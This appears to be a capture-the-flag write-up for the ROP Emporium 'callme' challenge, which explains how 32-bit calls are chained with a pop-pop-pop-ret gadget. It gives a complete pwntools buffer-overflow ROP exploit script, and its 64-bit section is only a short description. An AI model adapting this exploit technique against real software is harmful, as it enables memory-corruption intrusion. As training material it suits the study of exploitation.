search

callme

hashtag
callme 32bit

hashtag
Solution

This challenge intends to teach calling conventions in depth. Recall that 32-bit binaries store function arguments on the stack:

function
return_address,
arg1,
arg2,
arg3

What if we want to call multiple functions? The trick is to "clean up" the stack after each function call. In our case, each function takes three arguments, so we find a pop pop pop ret gadget. One candidate is pop esi ; pop edi ; pop ebp ; ret. If we use this gadget as the return address for each function, the three arguments for the current function will be popped off the stack.

hashtag
Exploit

#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="i386", os="linux")
elf = ELF("callme32", checksec=False)

#--------Offset--------#

p = elf.process()
pattern = cyclic(1024)
p.sendlineafter("> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
offset = cyclic_find(core.eip)

log.info(f"{offset = }")

#--------ROP--------#

callme_one = elf.plt["callme_one"]
callme_two = elf.sym["callme_two"]
callme_three = elf.plt["callme_three"]
# ROPgadget --binary callme32 --only "pop|ret"
pop_pop_pop_ret = 0x080487f9

arg1 = 0xdeadbeef
arg2 = 0xcafebabe
arg3 = 0xd00df00d

payload = flat(
    b"A" * offset,
    
    # Function 1
    callme_one,
    pop_pop_pop_ret, # return address for callme_one
    arg1, arg2, arg3, # args for callme_one
    
    # Function 2
    callme_two,
    pop_pop_pop_ret, # return address for callme_two
    arg1, arg2, arg3, # args for callme_two
    
    # Function 3
    callme_three,
    pop_pop_pop_ret, # return address for callme_three
    arg1, arg2, arg3, # args for callme_three
)

p = elf.process()

p.sendlineafter("> ", payload)

p.interactive()

hashtag
64bit

hashtag
Solution

The 64-bit case is even simpler. Here we simply find a pop rdi ; pop rsi ; pop rdx ; ret gadget to set up the arguments and call the function. Repeat the same process for each function.

hashtag
Exploit

PrevioussplitNextwrite4

Last updated